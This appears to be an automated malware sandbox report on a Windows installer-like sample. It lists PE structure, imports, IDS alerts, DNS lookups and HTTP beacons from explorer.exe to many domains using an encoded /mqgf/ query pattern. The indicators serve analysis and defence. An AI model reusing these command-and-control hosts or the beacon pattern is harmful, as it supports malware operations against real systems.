IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3f000          0x4340        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x294         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x6455        0x6600    False     0.667356004902   data       6.43794179006  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x134a        0x1400    False     0.459765625      data       5.23641914595  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x25538       0x600     False     0.461588541667   data       4.12893654735  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x30000          0xf000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x3f000          0x4340        0x4400    False     0.12890625       data       2.33445296823  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size    Type                  Language  Country
RT_ICON        0x3f310  0x10a8  data                  English   United States
RT_ICON        0x403b8  0xea8   GLS_BINARY_LSB_FIRST  English   United States
RT_ICON        0x41260  0x8a8   data                  English   United States
RT_ICON        0x41b08  0x568   GLS_BINARY_LSB_FIRST  English   United States
RT_ICON        0x42070  0x468   data                  English   United States
RT_ICON        0x424d8  0x2e8   data                  English   United States
RT_ICON        0x427c0  0x128   data                  English   United States
RT_DIALOG      0x428e8  0xb4    data                  English   United States
RT_DIALOG      0x429a0  0x120   data                  English   United States
RT_DIALOG      0x42ac0  0x202   data                  English   United States
RT_DIALOG      0x42cc8  0xf8    data                  English   United States
RT_DIALOG      0x42dc0  0xee    data                  English   United States
RT_GROUP_ICON  0x42eb0  0x68    data                  English   United States
RT_MANIFEST    0x42f18  0x423   XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

Imports

DLL           Import
KERNEL32.dll  SetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetFileAttributesA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll    GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll     SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll   SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll  AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll  ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll     OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system  Country where language is spoken  Map
English                         United States

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP        Dest IP
11/26/20-15:08:39.139293  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49766      34.102.136.180   192.168.2.4
11/26/20-15:08:44.471838  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49767      34.102.136.180   192.168.2.4
11/26/20-15:08:55.246997  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49769      75.126.100.11    192.168.2.4
11/26/20-15:09:05.767720  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49771      34.102.136.180   192.168.2.4

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 26, 2020 15:08:23.735517979 CET  49764        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:23.752428055 CET  80           49764      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:23.752602100 CET  49764        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:23.752765894 CET  49764        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:23.768997908 CET  80           49764      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:23.769018888 CET  80           49764      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:23.769026995 CET  80           49764      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:23.769195080 CET  49764        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:23.769305944 CET  49764        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:23.787704945 CET  80           49764      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:28.827683926 CET  49765        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:28.844005108 CET  80           49765      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:28.844106913 CET  49765        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:28.844275951 CET  49765        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:28.860564947 CET  80           49765      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:28.860582113 CET  80           49765      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:28.860589981 CET  80           49765      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:28.860757113 CET  49765        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:28.860820055 CET  49765        80         192.168.2.4      192.0.78.24
Nov 26, 2020 15:08:28.877034903 CET  80           49765      192.0.78.24      192.168.2.4
Nov 26, 2020 15:08:39.007757902 CET  49766        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:39.023983002 CET  80           49766      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:39.024090052 CET  49766        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:39.024245024 CET  49766        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:39.040355921 CET  80           49766      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:39.139292955 CET  80           49766      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:39.139324903 CET  80           49766      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:39.139566898 CET  49766        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:39.139718056 CET  49766        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:39.155819893 CET  80           49766      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:44.339562893 CET  49767        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:44.356126070 CET  80           49767      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:44.356231928 CET  49767        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:44.356384993 CET  49767        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:44.372896910 CET  80           49767      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:44.471837997 CET  80           49767      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:44.471859932 CET  80           49767      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:44.472093105 CET  49767        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:44.472237110 CET  49767        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:08:44.488727093 CET  80           49767      34.102.136.180   192.168.2.4
Nov 26, 2020 15:08:49.534532070 CET  49768        80         192.168.2.4      23.88.85.105
Nov 26, 2020 15:08:49.701931953 CET  80           49768      23.88.85.105     192.168.2.4
Nov 26, 2020 15:08:49.702104092 CET  49768        80         192.168.2.4      23.88.85.105
Nov 26, 2020 15:08:49.702579021 CET  49768        80         192.168.2.4      23.88.85.105
Nov 26, 2020 15:08:49.871308088 CET  80           49768      23.88.85.105     192.168.2.4
Nov 26, 2020 15:08:49.871728897 CET  49768        80         192.168.2.4      23.88.85.105
Nov 26, 2020 15:08:49.871788025 CET  49768        80         192.168.2.4      23.88.85.105
Nov 26, 2020 15:08:50.039123058 CET  80           49768      23.88.85.105     192.168.2.4
Nov 26, 2020 15:08:54.974551916 CET  49769        80         192.168.2.4      75.126.100.11
Nov 26, 2020 15:08:55.110631943 CET  80           49769      75.126.100.11    192.168.2.4
Nov 26, 2020 15:08:55.110913992 CET  49769        80         192.168.2.4      75.126.100.11
Nov 26, 2020 15:08:55.111057997 CET  49769        80         192.168.2.4      75.126.100.11
Nov 26, 2020 15:08:55.246968985 CET  80           49769      75.126.100.11    192.168.2.4
Nov 26, 2020 15:08:55.246997118 CET  80           49769      75.126.100.11    192.168.2.4
Nov 26, 2020 15:08:55.247005939 CET  80           49769      75.126.100.11    192.168.2.4
Nov 26, 2020 15:08:55.247483969 CET  49769        80         192.168.2.4      75.126.100.11
Nov 26, 2020 15:08:55.383516073 CET  80           49769      75.126.100.11    192.168.2.4
Nov 26, 2020 15:09:00.310724974 CET  49770        80         192.168.2.4      95.215.210.10
Nov 26, 2020 15:09:00.427397013 CET  80           49770      95.215.210.10    192.168.2.4
Nov 26, 2020 15:09:00.427512884 CET  49770        80         192.168.2.4      95.215.210.10
Nov 26, 2020 15:09:00.427666903 CET  49770        80         192.168.2.4      95.215.210.10
Nov 26, 2020 15:09:00.543589115 CET  80           49770      95.215.210.10    192.168.2.4
Nov 26, 2020 15:09:00.543806076 CET  80           49770      95.215.210.10    192.168.2.4
Nov 26, 2020 15:09:00.543859005 CET  80           49770      95.215.210.10    192.168.2.4
Nov 26, 2020 15:09:00.543992996 CET  49770        80         192.168.2.4      95.215.210.10
Nov 26, 2020 15:09:00.544039965 CET  49770        80         192.168.2.4      95.215.210.10
Nov 26, 2020 15:09:00.659297943 CET  80           49770      95.215.210.10    192.168.2.4
Nov 26, 2020 15:09:05.636172056 CET  49771        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:09:05.652481079 CET  80           49771      34.102.136.180   192.168.2.4
Nov 26, 2020 15:09:05.652625084 CET  49771        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:09:05.652915001 CET  49771        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:09:05.669075966 CET  80           49771      34.102.136.180   192.168.2.4
Nov 26, 2020 15:09:05.767719984 CET  80           49771      34.102.136.180   192.168.2.4
Nov 26, 2020 15:09:05.767754078 CET  80           49771      34.102.136.180   192.168.2.4
Nov 26, 2020 15:09:05.767883062 CET  49771        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:09:05.767950058 CET  49771        80         192.168.2.4      34.102.136.180
Nov 26, 2020 15:09:05.785839081 CET  80           49771      34.102.136.180   192.168.2.4
Nov 26, 2020 15:09:10.998608112 CET  49772        80         192.168.2.4      165.227.229.15
Nov 26, 2020 15:09:11.026669025 CET  80           49772      165.227.229.15   192.168.2.4
Nov 26, 2020 15:09:11.026842117 CET  49772        80         192.168.2.4      165.227.229.15
Nov 26, 2020 15:09:11.027050972 CET  49772        80         192.168.2.4      165.227.229.15
Nov 26, 2020 15:09:11.054827929 CET  80           49772      165.227.229.15   192.168.2.4
Nov 26, 2020 15:09:11.522761106 CET  49772        80         192.168.2.4      165.227.229.15
Nov 26, 2020 15:09:11.589823961 CET  80           49772      165.227.229.15   192.168.2.4
Nov 26, 2020 15:09:13.298913956 CET  80           49772      165.227.229.15   192.168.2.4
Nov 26, 2020 15:09:13.299211025 CET  49772        80         192.168.2.4      165.227.229.15
Nov 26, 2020 15:09:13.315665007 CET  80           49772      165.227.229.15   192.168.2.4
Nov 26, 2020 15:09:13.315711975 CET  80           49772      165.227.229.15   192.168.2.4
Nov 26, 2020 15:09:13.315924883 CET  49772        80         192.168.2.4      165.227.229.15
Nov 26, 2020 15:09:13.316107035 CET  49772        80         192.168.2.4      165.227.229.15

                                                                                                                                  UDP Packets


                                                                                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 26, 2020 15:08:23.667031050 CET | 192.168.2.4 | 8.8.8.8 | 0xa1d5 | Standard query (0) | www.carnesveymacr.com | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:28.776492119 CET | 192.168.2.4 | 8.8.8.8 | 0x3f4b | Standard query (0) | www.mehler.photography | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:33.867263079 CET | 192.168.2.4 | 8.8.8.8 | 0xb2a | Standard query (0) | www.uyieoamejus2zd.com | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:38.957355022 CET | 192.168.2.4 | 8.8.8.8 | 0xef12 | Standard query (0) | www.thelonerangernews.com | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:44.277055979 CET | 192.168.2.4 | 8.8.8.8 | 0xeae2 | Standard query (0) | www.hvcharging.com | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:49.482791901 CET | 192.168.2.4 | 8.8.8.8 | 0x2278 | Standard query (0) | www.jddq888.com | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:54.903394938 CET | 192.168.2.4 | 8.8.8.8 | 0x2c83 | Standard query (0) | www.wtmailer15.com | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:00.259206057 CET | 192.168.2.4 | 8.8.8.8 | 0x8642 | Standard query (0) | www.wastie.club | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:05.562294960 CET | 192.168.2.4 | 8.8.8.8 | 0x460c | Standard query (0) | www.gettingthehelloutofca.com | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:10.801733971 CET | 192.168.2.4 | 8.8.8.8 | 0x26fc | Standard query (0) | www.caelaabadie.com | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:16.539433002 CET | 192.168.2.4 | 8.8.8.8 | 0xc857 | Standard query (0) | www.mapnimbis.com | A (IP address) | IN (0x0001)

                                                                                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 26, 2020 15:08:23.724678993 CET | 8.8.8.8 | 192.168.2.4 | 0xa1d5 | No error (0) | www.carnesveymacr.com | carnesveymacr.com | | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 15:08:23.724678993 CET | 8.8.8.8 | 192.168.2.4 | 0xa1d5 | No error (0) | carnesveymacr.com | | 192.0.78.24 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:23.724678993 CET | 8.8.8.8 | 192.168.2.4 | 0xa1d5 | No error (0) | carnesveymacr.com | | 192.0.78.25 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:28.826474905 CET | 8.8.8.8 | 192.168.2.4 | 0x3f4b | No error (0) | www.mehler.photography | mehler.photography | | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 15:08:28.826474905 CET | 8.8.8.8 | 192.168.2.4 | 0x3f4b | No error (0) | mehler.photography | | 192.0.78.24 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:28.826474905 CET | 8.8.8.8 | 192.168.2.4 | 0x3f4b | No error (0) | mehler.photography | | 192.0.78.25 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:33.917606115 CET | 8.8.8.8 | 192.168.2.4 | 0xb2a | Name error (3) | www.uyieoamejus2zd.com | none | none | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:39.006593943 CET | 8.8.8.8 | 192.168.2.4 | 0xef12 | No error (0) | www.thelonerangernews.com | thelonerangernews.com | | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 15:08:39.006593943 CET | 8.8.8.8 | 192.168.2.4 | 0xef12 | No error (0) | thelonerangernews.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:44.338299990 CET | 8.8.8.8 | 192.168.2.4 | 0xeae2 | No error (0) | www.hvcharging.com | hvcharging.com | | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 15:08:44.338299990 CET | 8.8.8.8 | 192.168.2.4 | 0xeae2 | No error (0) | hvcharging.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:49.533351898 CET | 8.8.8.8 | 192.168.2.4 | 0x2278 | No error (0) | www.jddq888.com | jddq888.com | | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 15:08:49.533351898 CET | 8.8.8.8 | 192.168.2.4 | 0x2278 | No error (0) | jddq888.com | | 23.88.85.105 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:08:54.973221064 CET | 8.8.8.8 | 192.168.2.4 | 0x2c83 | No error (0) | www.wtmailer15.com | | 75.126.100.11 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:00.309253931 CET | 8.8.8.8 | 192.168.2.4 | 0x8642 | No error (0) | www.wastie.club | wastie.club | | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 15:09:00.309253931 CET | 8.8.8.8 | 192.168.2.4 | 0x8642 | No error (0) | wastie.club | | 95.215.210.10 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:05.633838892 CET | 8.8.8.8 | 192.168.2.4 | 0x460c | No error (0) | www.gettingthehelloutofca.com | gettingthehelloutofca.com | | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 15:09:05.633838892 CET | 8.8.8.8 | 192.168.2.4 | 0x460c | No error (0) | gettingthehelloutofca.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:10.996421099 CET | 8.8.8.8 | 192.168.2.4 | 0x26fc | No error (0) | www.caelaabadie.com | caelaabadie.com | | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 15:09:10.996421099 CET | 8.8.8.8 | 192.168.2.4 | 0x26fc | No error (0) | caelaabadie.com | | 165.227.229.15 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:16.707619905 CET | 8.8.8.8 | 192.168.2.4 | 0xc857 | No error (0) | www.mapnimbis.com | | 45.33.2.79 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:16.707619905 CET | 8.8.8.8 | 192.168.2.4 | 0xc857 | No error (0) | www.mapnimbis.com | | 198.58.118.167 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:16.707619905 CET | 8.8.8.8 | 192.168.2.4 | 0xc857 | No error (0) | www.mapnimbis.com | | 45.33.23.183 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:16.707619905 CET | 8.8.8.8 | 192.168.2.4 | 0xc857 | No error (0) | www.mapnimbis.com | | 96.126.123.244 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:16.707619905 CET | 8.8.8.8 | 192.168.2.4 | 0xc857 | No error (0) | www.mapnimbis.com | | 45.56.79.23 | A (IP address) | IN (0x0001)
Nov 26, 2020 15:09:16.707619905 CET | 8.8.8.8 | 192.168.2.4 | 0xc857 | No error (0) | www.mapnimbis.com | | 45.79.19.196 | A (IP address) | IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • www.carnesveymacr.com
                                                                                                                                  • www.mehler.photography
                                                                                                                                  • www.thelonerangernews.com
                                                                                                                                  • www.hvcharging.com
                                                                                                                                  • www.jddq888.com
                                                                                                                                  • www.wtmailer15.com
                                                                                                                                  • www.wastie.club
                                                                                                                                  • www.gettingthehelloutofca.com
                                                                                                                                  • www.caelaabadie.com

                                                                                                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49764 | 192.0.78.24 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:08:23.752765894 CET | 1403 | OUT | GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
Host: www.carnesveymacr.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 15:08:23.769018888 CET | 1403 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 26 Nov 2020 14:08:23 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0
X-ac: 2.hhn _dfw
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49765 | 192.0.78.24 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 15:08:28.844275951 CET | 1404 | OUT | GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1
Host: www.mehler.photography
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 15:08:28.860582113 CET | 1405 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 26 Nov 2020 14:08:28 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS
X-ac: 2.hhn _dfw
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49766 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Nov 26, 2020 15:08:39.024245024 CET | kBytes transferred: 1406 | Direction: OUT | Data:
GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1
Host: www.thelonerangernews.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Nov 26, 2020 15:08:39.139292955 CET | kBytes transferred: 1406 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 14:08:39 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fbfb454-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49767 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Nov 26, 2020 15:08:44.356384993 CET | kBytes transferred: 1409 | Direction: OUT | Data:
GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
Host: www.hvcharging.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Nov 26, 2020 15:08:44.471837997 CET | kBytes transferred: 1409 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 14:08:44 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb7c734-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49768 | Destination IP: 23.88.85.105 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Nov 26, 2020 15:08:49.702579021 CET | kBytes transferred: 1410 | Direction: OUT | Data:
GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1
Host: www.jddq888.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Nov 26, 2020 15:08:49.871308088 CET | kBytes transferred: 1410 | Direction: IN | Data:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Thu, 26 Nov 2020 14:08:46 GMT
Connection: close
Content-Length: 57
Data Raw: e6 97 a0 e6 b3 95 e6 98 be e7 a4 ba e9 a1 b5 e9 9d a2 ef bc 8c e5 9b a0 e4 b8 ba e5 8f 91 e7 94 9f e5 86 85 e9 83 a8 e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af e3 80 82
Data Ascii:


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49769 | Destination IP: 75.126.100.11 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Nov 26, 2020 15:08:55.111057997 CET | kBytes transferred: 1411 | Direction: OUT | Data:
GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
Host: www.wtmailer15.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Nov 26, 2020 15:08:55.246997118 CET | kBytes transferred: 1412 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 26 Nov 2020 14:08:55 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49770 | Destination IP: 95.215.210.10 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Nov 26, 2020 15:09:00.427666903 CET | kBytes transferred: 1413 | Direction: OUT | Data:
GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1
Host: www.wastie.club
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Nov 26, 2020 15:09:00.543806076 CET | kBytes transferred: 1414 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Date: Thu, 26 Nov 2020 14:09:00 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.19
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
